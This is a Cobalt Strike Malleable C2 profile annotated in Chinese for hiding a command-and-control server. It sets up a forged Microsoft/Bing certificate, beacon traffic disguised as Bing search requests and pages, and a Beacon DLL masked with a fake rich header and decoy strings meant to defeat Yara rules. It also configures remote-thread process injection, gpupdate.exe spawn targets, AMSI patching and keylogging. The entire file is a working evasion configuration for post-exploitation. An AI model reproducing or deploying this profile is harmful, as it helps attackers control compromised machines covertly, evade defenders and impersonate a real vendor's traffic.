CS服务器隐匿
#替代默认ssl.store证书,自签ssl证书
https-certificate {
# 使用真实有效的SSL证书则只需用keystore和password
# set keystore "密钥库文件";
# set password "密码库文件密码"
set CN "www.bing.com";
set O "Microsoft Corporation";
set C "US";
set L "Redmond";
set OU "Microsoft IT";
set ST "WA";
set validity "365";
}
# 表明这是默认的 Beacon 配置文件
set sample_name "ExterminateDog";
# 设置睡眠时间为 60000 (默认为 60 秒)
set sleeptime "30000";
# 默认回连的抖动因子 0-99% [随机化回调时间]
set jitter "0";
set dns_idle "8.8.8.8";
# 在 DNS A 记录请求中发送的最大字节数,可以使 DNS Beacon 发送数据看起来比较正常
set maxdns "235";
# 设置每次发送请求的用户代理UA
set useragent "Mozilla/5.0 (Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko";
set pipename "mypipe-f##";
set pipename_stager "mypipe-h##";
# 控制Beacon DLL如何加载到内存中并编辑Beacon DLL的内容
stage {
# 要求 Beacon 尝试释放与初始化它的反射 DLL 包关联的内存
set cleanup "true";
set checksum "0";
set entry_point "134733";
set image_size_x86 "512000";
set image_size_x64 "512000";
set name "Gtmdusa.dll";
set rich_header "/x63/x02/x25/x0f/x27/x63/x4b/x5c/x27/x63/x4b/x5c/x27/x63/x4b/x5c/x9a/x2c/xdd/x5c/x24/x63/x4b/x5c/x2e/x1b/xde/x5c/x3b/x63/x4b/x5c/x2e/x1b/xcf/x5c/x1b/x63/x4b/x5c/x2e/x1b/xc8/x5c/x8f/x63/x4b/x5c/x00/xa5/x30/x5c/x28/x63/x4b/x5c/x27/x63/x4a/x5c/x97/x63/x4b/x5c/x2e/x1b/xc1/x5c/x60/x63/x4b/x5c/x2e/x1b/xd9/x5c/x26/x63/x4b/x5c/x39/x31/xdf/x5c/x26/x63/x4b/x5c/x2e/x1b/xda/x5c/x26/x63/x4b/x5c/x52/x69/x63/x68/x27/x63/x4b/x5c/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00";
# 内存中轻微混淆Beacon DLL
set stomppe "false";
# make these things havex-ish
transform-x86 {
strrep "ReflectiveLoader" "RunDllEntry";
strrep "sos.dll" "";
}
transform-x64 {
strrep "ReflectiveLoader" "RunDllEntry";
strrep "sos.x64.dll" "";
}
# strings gathered from Yara rules and sandbox string dumps
stringw "%s <%s> (Type=%i, Access=%i, ID='%s')";
stringw "%02i was terminated by ThreadManager(2)/n";
stringw "main sort initialise ..../../../../img/n";
stringw "qsort [0x%x, 0x%x] done %d this %d/n";
stringw "{0x%08x, 0x%08x}";
stringw "Programm was started at %02i:%02i:%02i/n";
stringw "a+";
stringw "%02i:%02i:%02i.%04i:";
stringw "**************************************************************************/n";
stringw "Start finging of LAN hosts..../../../../img/n";
stringw "Finding was fault. Unexpective error/n";
stringw "Hosts was't found../../../../img/n";
stringw "/t/t/t/t/t%O2i) [%s]/n";
stringw "Start finging of OPC Servers...";
stringw "Was found %i OPC Servers.";
stringw "/t/t%i) [%s//%s]/n/t/t/tCLSID: %s/n";
stringw "/t/t/tUserType: %s/n/t/t/tVerIndProgID: %s/n";
stringw "OPC Servers not found. Programm finished";
stringw "Start finging of OPC Tags...";
stringw "[-]Threads number > Hosts number";
stringw "[-]Can not get local ip";
stringw "[!]Start";
stringw "[+]Get WSADATA";
stringw "[+]Local:";
stringw "[-]Connection error";
stringw "Was found %i hosts in LAN:";
stringw "%s[%s]!!!EXEPTION %i!!!";
stringw "final combined CRC = 0x%08x";
}
# 为HTTP GET定义指标,仅对通信过程中的GET请求有效
http-get {
# Beacon将从这个URI池中随机选择一个作为通信时使用的URL(如果提供了多个URI)
set uri "/search/";
# 客户端响应规则
client {
#使用header设置http响应头字段
header "Host" "www.bing.com";
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
header "Cookie" "MUID=20798CDBA7526BE709939C67A67C6ABD; _EDGE_S=F=1&SID=0D72DD12F8986C1D3C96CDAEF9B66D85; _EDGE_V=1; SRCHD=AF=NOFORM; SRCHUID=V=2&GUID=4E021D8EBD484402BBD21AE8C3DB5A41&dmnchg=1;";
# base64 编码会话元数据并将其存储在Cookie标头中
metadata {
base64url;
# 将数据存储在指定的URL参数q中
parameter "q";
}
parameter "go" "Search";
parameter "qs" "bs";
parameter "form" "QBRE";
}
# 服务端响应规则
server {
# 服务端应该发送没有更改的输出
header "Server" "Microsoft-IIS/8.5";
header "Cache-Control" "private, max-age=0";
header "Content-Type" "text/html; charset=utf-8";
header "Keep-Alive" "timeout=3, max=100";
header "Connection" "close";
header "Vary" "Accept-Encoding";
# 通过output代码块设置返回数据的编码规则
output {
base64;
prepend "<!DOCTYPE html><html lang=/"en/" xml:lang=/"en/" xmlns=/"http://www.w3.org/1999/xhtml/" xmlns:Web=/"http://schemas.live.com/Web//"><script type=/"text/javascript/">//<![CDATA[si_ST=new Date;//]]></script><head><!--pc--><title>Bing</title><meta content=/"text/html; charset=utf-8/" http-equiv=/"content-type/" /><link href=/"/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE/" rel=/"alternate/" title=/"XML/" type=/"text/xml/" /><link href=/"/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE/" rel=/"alternate/" title=/"RSS/" type=/"application/rss+xml/" /><link href=/"/sa/simg/bing_p_rr_teal_min.ico/" rel=/"shortcut icon/" /><script type=/"text/javascript/">//<![CDATA[";
append "G={ST:(si_ST?si_ST:new Date),Mkt:/"en-US/",RTL:false,Ver:/"53/",IG:/"4C1158CCBAFC4896AD78ED0FF0F4A1B2/",EventID:/"E37FA2E804B54C71B3E275E9589590F8/",MN:/"SERP/",V:/"web/",P:/"SERP/",DA:/"CO4/",SUIH:/"OBJhNcrOC72Z3mr21coFQw/",gpUrl:/"/fd/ls/GLinkPing.aspx?/" }; _G.lsUrl=/"/fd/ls/l?IG=/"+_G.IG ;curUrl=/"http://www.bing.com/search/";function si_T(a){ if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+/"IG=/"+_G.IG+/"&/"+a;}return true;};//]]></script><style type=/"text/css/">.sw_ddbk:after,.sw_ddw:after,.sw_ddgn:after,.sw_poi:after,.sw_poia:after,.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after,.sw_st:after,.sw_sth:after,.sw_ste:after,.sw_st2:after,.sw_plus:after,.sw_tpcg:after,.sw_tpcw:after,.sw_tpcbk:after,.sw_arwh:after,.sb_pagN:after,.sb_pagP:after,.sw_up:after,.sw_down:after,.b_expandToggle:after,.sw_calc:after,.sw_fbi:after,";
# output代码块需要一个关键字来表示编码规则终止,使用print表示直接输出放到body中
print;
}
}
}
# 为HTTP POST定义指标,仅对通信过程中的POST请求有效
http-post {
# 同上,Beacon会从这个URI池中随机选择一个作为通信时使用的URL(如果提供了多个URI)
set uri "/Search/";
client {
header "Host" "www.bing.com";
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
header "Cookie" "MUID=20798CDBA7526BE709939C67A67C6ABD; _EDGE_S=F=1&SID=0D72DD12F8986C1D3C96CDAEF9B66D85; _EDGE_V=1; SRCHD=AF=NOFORM; SRCHUID=V=2&GUID=4E021D8EBD484402BBD21AE8C3DB5A41&dmnchg=1;";
# 将我们的会话标识符传输为 /search?q=[identifier]
# 任务id由此代码块控制
id {
base64url;
parameter "form";
}
parameter "go" "Search";
parameter "qs" "bs";
# 在没有实际更改的情况下POST我们的输出
output {
# 变异Base64编码
base64url;
# 将数据存储在指定的URL参数q中
parameter "q";
}
}
# 服务端对 HTTP POST 的响应
server {
header "Cache-Control" "no-cache";
header "Keep-Alive" "timeout=3, max=100";
header "Cache-Control" "private, max-age=0";
header "Content-Type" "text/html; charset=utf-8";
header "Vary" "Accept-Encoding";
header "Server" "Microsoft-IIS/8.5";
header "Connection" "close";
output {
netbios;
base64;
prepend "<!DOCTYPE html><html lang=/"en/" xml:lang=/"en/" xmlns=/"http://www.w3.org/1999/xhtml/" xmlns:Web=/"http://schemas.live.com/Web//"><script type=/"text/javascript/">//<![CDATA[si_ST=new Date;//]]></script><head><!--pc--><title>Bing</title><meta content=/"text/html; charset=utf-8/" http-equiv=/"content-type/" /><link href=/"/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE/" rel=/"alternate/" title=/"XML/" type=/"text/xml/" /><link href=/"/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE/" rel=/"alternate/" title=/"RSS/" type=/"application/rss+xml/" /><link href=/"/sa/simg/bing_p_rr_teal_min.ico/" rel=/"shortcut icon/" /><script type=/"text/javascript/">//<![CDATA[";
append "G={ST:(si_ST?si_ST:new Date),Mkt:/"en-US/",RTL:false,Ver:/"53/",IG:/"4C1158CCBAFC4896AD78ED0FF0F4A1B2/",EventID:/"E37FA2E804B54C71B3E275E9589590F8/",MN:/"SERP/",V:/"web/",P:/"SERP/",DA:/"CO4/",SUIH:/"OBJhNcrOC72Z3mr21coFQw/",gpUrl:/"/fd/ls/GLinkPing.aspx?/" }; _G.lsUrl=/"/fd/ls/l?IG=/"+_G.IG ;curUrl=/"http://www.bing.com/search/";function si_T(a){ if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+/"IG=/"+_G.IG+/"&/"+a;}return true;};//]]></script><style type=/"text/css/">.sw_ddbk:after,.sw_ddw:after,.sw_ddgn:after,.sw_poi:after,.sw_poia:after,.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after,.sw_st:after,.sw_sth:after,.sw_ste:after,.sw_st2:after,.sw_plus:after,.sw_tpcg:after,.sw_tpcw:after,.sw_tpcbk:after,.sw_arwh:after,.sb_pagN:after,.sb_pagP:after,.sw_up:after,.sw_down:after,.b_expandToggle:after,.sw_calc:after,.sw_fbi:after,";
print;
}
}
}
# 此代码块用来控制stage(Beacon核心代码)发送过程
http-stager {
set uri_x86 "/rpc";
set uri_x64 "/Rpc";
client {
header "Accept" "*/*";
}
server {
header "Cache-Control" "private, max-age=0";
header "Content-Type" "text/html; charset=utf-8";
header "Vary" "Accept-Encoding";
header "Server" "Microsoft-IIS/8.5";
header "Connection" "close";
}
}
# 此代码块可对进程注入相关的内容进行配置,控制注入相关的行为
process-inject {
# CreateRemoteThread;
# 在远程进程中分配内存的首选方法
set allocator "NtMapViewOfSection";
# 请求注入内容的最小内容量
set min_alloc "16700";
# 使用RWX作为注入内容的最终权限 替代方案是RX
set userwx "false";
# 使用RWX作为注入内容的初始权限 替代方案是RW
set startrwx "true";
# 向Beacon注入的内容里添加东西
transform-x86 {
# prepend "/x90/x90/x90";
}
transform-x64 {
# prepend "/x90/x90/x90";
}
# 此代码块控制Beacon在进程注入时要使用的方法
execute {
#CreateThread;
#CreateRemoteThread;
CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";
SetThreadContext;
NtQueueApcThread-s;
#NtQueueApcThread;
CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
RtlCreateUserThread;
}
}
# 此代码块控制了Cobalt Strike的后渗透任务的具体内容和行为。
post-ex {
# 控制后渗透功能生成的临时进程
set spawnto_x86 "%windir%//syswow64//gpupdate.exe";
set spawnto_x64 "%windir%//sysnative//gpupdate.exe";
# 混淆post-ex DLL内容
set obfuscate "true";
# 指示Beacon将关键函数指针(如GetProcAddress和LoadLibrary)嵌入到同架构的post-ex DLL中
set smartinject "true";
# 选项指示powerpick、execute-assembly和psinject在加载.NET或PowerShell代码之前-
# -对AmsiScanBuffer函数进行修补。(限制反恶意软件扫描接口)
set amsi_disable "true";
# 允许多线程的post-ex DLL使用线程地址欺骗
set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";
# 更改通信时使用的命名管道的名字
set pipename "DserNamePipe##, PGMessagePipe##, MsFteWds##";
# Cobalt Strike的键盘记录器使用的函数
set keylogger "SetWindowsHookEx";
}